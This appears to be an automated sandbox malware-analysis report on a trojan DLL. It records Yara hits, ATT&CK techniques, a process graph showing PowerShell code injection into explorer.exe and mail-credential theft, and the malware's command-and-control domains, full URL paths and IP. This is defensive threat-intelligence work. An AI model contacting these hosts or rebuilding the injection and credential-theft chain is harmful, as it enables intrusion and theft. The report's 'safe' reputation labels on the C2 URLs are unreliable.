          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information2Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection812Software Packing2LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsPowerShell1Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol5SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection812DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRegsvr321Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 353281 Sample: SecuriteInfo.com.Generic.mg... Startdate: 16/02/2021 Architecture: WINDOWS Score: 100 64 resolver1.opendns.com 2->64 80 Multi AV Scanner detection for domain / URL 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 10 other signatures 2->86 9 mshta.exe 2->9         started        12 loaddll32.exe 1 2->12         started        signatures3 process4 signatures5 102 Suspicious powershell command line found 9->102 14 powershell.exe 9->14         started        18 regsvr32.exe 12->18         started        20 cmd.exe 1 12->20         started        process6 file7 60 C:\Users\user\AppData\Local\...\wi0gyoxl.0.cs, UTF-8 14->60 dropped 62 C:\Users\user\AppData\...\gayi4abp.cmdline, UTF-8 14->62 dropped 104 Injects code into the Windows Explorer (explorer.exe) 14->104 106 Writes to foreign memory regions 14->106 108 Modifies the context of a thread in another process (thread injection) 14->108 116 2 other signatures 14->116 22 explorer.exe 14->22 injected 26 csc.exe 14->26         started        29 csc.exe 14->29         started        31 conhost.exe 14->31         started        110 Maps a DLL or memory area into another process 18->110 112 Writes or reads registry keys via WMI 18->112 114 Writes registry values via WMI 18->114 33 control.exe 18->33         started        35 iexplore.exe 1 86 20->35         started        signatures8 process9 dnsIp10 66 c56.lepini.at 22->66 68 api3.lepini.at 22->68 88 Tries to steal Mail credentials (via file access) 22->88 90 Changes memory attributes in foreign processes to executable or writable 22->90 92 Writes to foreign memory regions 22->92 100 2 other signatures 22->100 37 RuntimeBroker.exe 22->37 injected 54 3 other processes 22->54 56 C:\Users\user\AppData\Local\...\gayi4abp.dll, PE32 26->56 dropped 39 cvtres.exe 26->39         started        58 C:\Users\user\AppData\Local\...\wi0gyoxl.dll, PE32 29->58 dropped 41 cvtres.exe 29->41         started        94 Allocates memory in foreign processes 33->94 96 Modifies the context of a thread in another process (thread injection) 33->96 98 Maps a DLL or memory area into another process 33->98 43 rundll32.exe 33->43         started        70 192.168.2.1 unknown unknown 35->70 45 iexplore.exe 154 35->45         started        48 iexplore.exe 29 35->48         started        50 iexplore.exe 29 35->50         started        52 iexplore.exe 35->52         started        file11 signatures12 process13 dnsIp14 72 img.img-taboola.com 45->72 74 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49759, 49760 FASTLYUS United States 45->74 78 8 other IPs or domains 45->78 76 api10.laptok.at 34.65.144.159, 49775, 49776, 49780 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 48->76

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll16%VirustotalBrowse
          SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll10%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.3.regsvr32.exe.5c2e4a0.2.unpack100%AviraHEUR/AGEN.1132033Download File
          2.3.regsvr32.exe.5ea94a0.1.unpack100%AviraHEUR/AGEN.1132033Download File
          2.2.regsvr32.exe.33f0000.1.unpack100%AviraHEUR/AGEN.1108168Download File

          Domains

          SourceDetectionScannerLabelLink
          tls13.taboola.map.fastly.net0%VirustotalBrowse
          c56.lepini.at8%VirustotalBrowse
          api3.lepini.at11%VirustotalBrowse
          api10.laptok.at11%VirustotalBrowse
          img.img-taboola.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E0%Avira URL Cloudsafe
          http://constitution.org/usdeclar.txt0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN0%Avira URL Cloudsafe
          http://api3.lepini.at/api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov0%Avira URL Cloudsafe
          http://api3.lepini.at/api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI0%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
          http://www.microsoft.co0%URL Reputationsafe
          http://www.microsoft.co0%URL Reputationsafe
          http://www.microsoft.co0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://c56.lepini.at/jvassets/xI/t64.dat100%Avira URL Cloudphishing
          http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
          http://api10.laptok.at/api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://api10.laptok.at/favicon.ico0%Avira URL Cloudsafe
          http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha0%Avira URL Cloudsafe
          http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          contextual.media.net
          		184.30.24.22
          		truefalse
            		high
            tls13.taboola.map.fastly.net
            		151.101.1.44
            		truefalseunknown
            hblg.media.net
            		184.30.24.22
            		truefalse
              		high
              c56.lepini.at
              		34.65.144.159
              		truetrueunknown
              lg3.media.net
              		184.30.24.22
              		truefalse
                		high
                resolver1.opendns.com
                		208.67.222.222
                		truefalse
                  		high
                  api3.lepini.at
                  		34.65.144.159
                  		truefalseunknown
                  geolocation.onetrust.com
                  		104.20.184.68
                  		truefalse
                    		high
                    api10.laptok.at
                    		34.65.144.159
                    		truefalseunknown
                    www.msn.com
                    		unknown
                    		unknownfalse
                      		high
                      srtb.msn.com
                      		unknown
                      		unknownfalse
                        		high
                        img.img-taboola.com
                        		unknown
                        		unknowntrueunknown
                        web.vortex.data.msn.com
                        		unknown
                        		unknownfalse
                          		high
                          cvision.media.net
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/Efalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api3.lepini.at/api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTovfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api3.lepini.at/api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzIfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://c56.lepini.at/jvassets/xI/t64.dattrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://api10.laptok.at/api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFIfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api10.laptok.at/favicon.icofalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/hafalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpfalse
                              		high
                              http://constitution.org/usdeclar.txtpowershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpfalse
                                		high
                                http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNregsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpfalse
                                  		high
                                  http://constitution.org/usdeclar.txtC:powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.microsoft.copowershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://https://file://USER.ID%lu.exe/updpowershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.%s.comPAexplorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  https://www.msn.com/de-ch/?ocid=iehpexplorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmpfalse
                                      		high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpfalse
                                        		high
                                        http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkexplorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        34.65.144.159
                                        		unknownUnited States
                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                        104.20.184.68
                                        		unknownUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        151.101.1.44
                                        		unknownUnited States
                                        		54113FASTLYUSfalse

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:353281
                                        Start date:16.02.2021
                                        Start time:00:56:32
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 40s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:36
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:4
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.bank.troj.spyw.evad.winDLL@36/159@18/4
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 84.2% (good quality ratio 79.5%)
                                        • Quality average: 79.2%
                                        • Quality standard deviation: 29.1%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 169
                                        • Number of non-executed functions: 21
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 88.221.62.148, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.231, 92.122.213.187, 65.55.44.109, 184.30.24.22, 51.104.144.132, 92.122.213.194, 92.122.213.247, 152.199.19.161, 52.155.217.156, 205.185.216.10, 205.185.216.42, 20.54.26.129
                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        00:58:27API Interceptor43x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        34.65.144.159SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                        • c56.lepini.at/jvassets/xI/t64.dat
                                        NJPcHPuRcG.dllGet hashmaliciousBrowse
                                        • c56.lepini.at/jvassets/xI/t64.dat
                                        Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                        • c56.lepini.at/jvassets/xI/t64.dat
                                        104.20.184.68SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                          NJPcHPuRcG.dllGet hashmaliciousBrowse
                                            Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                              13xakh1PtD.dllGet hashmaliciousBrowse
                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                  RI51uAIUyL.dllGet hashmaliciousBrowse
                                                    Server.exeGet hashmaliciousBrowse
                                                      mon48_cr.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                          Wh102yYa..dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.Bulz.349310.24122.dllGet hashmaliciousBrowse
                                                                acr1.dllGet hashmaliciousBrowse
                                                                  TRIGANOcr.dllGet hashmaliciousBrowse
                                                                    BullGuard.dllGet hashmaliciousBrowse
                                                                      Jidert.dllGet hashmaliciousBrowse
                                                                        Vu2QRHVR8C.dllGet hashmaliciousBrowse
                                                                          header[1].jpg.dllGet hashmaliciousBrowse
                                                                            SimpleAudio.dllGet hashmaliciousBrowse
                                                                              cSPuZxa7I4.dllGet hashmaliciousBrowse
                                                                                151.101.1.44http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacbGet hashmaliciousBrowse
                                                                                • cdn.taboola.com/libtrc/w4llc-network/loader.js

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                hblg.media.netSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
